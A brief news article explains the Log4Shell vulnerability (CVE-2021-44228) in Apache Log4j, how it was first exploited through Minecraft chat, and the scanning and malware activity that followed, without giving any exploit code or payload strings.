Log4Shell is a new zeroday vulnerability discovered last Thursday when it was exploited to remotely compromise Minecraft servers. The vulnerability was traced with the code CVE-2021-44228 and was assigned a severity level of 10 out of 10 as it can be exploited very easily and allows the execution of remote unauthenticated code.
The vulnerability concerns in particular Log4j, an open source event logging tool based on Java and available from Apache that is used by hundreds of thousands of apps, especially in the cloud and including those commonly used in almost all companies on the planet. .
Event logging is a process by which applications keep an up-to-date list of the activities performed and which can thus be analyzed later in the event of errors. Almost all network security systems run some kind of event log, which gives libraries such as Log4j nearly endless coverage.
The exploitation of the vulnerability occurs by managing to have a special sequence of characters recorded on the log, as Cloudflare illustrated in detail in its analysis. And, as mentioned, the vulnerability can be exploited with ease: in the case of Minecraft, for example, it was possible to record the sequence of characters on the log simply by sending a message in the chat within the game.
Since the compromise of the Minecraft servers occurred, the security company Greynoise has detected an active scan in progress on the Internet that attempted to identify vulnerable servers. The researchers point out that they have observed that the vulnerability is exploited for various purposes: from the installation of malware to cryptomining, to the hardening of Linux botnets, passing from the extraction of data and configurations.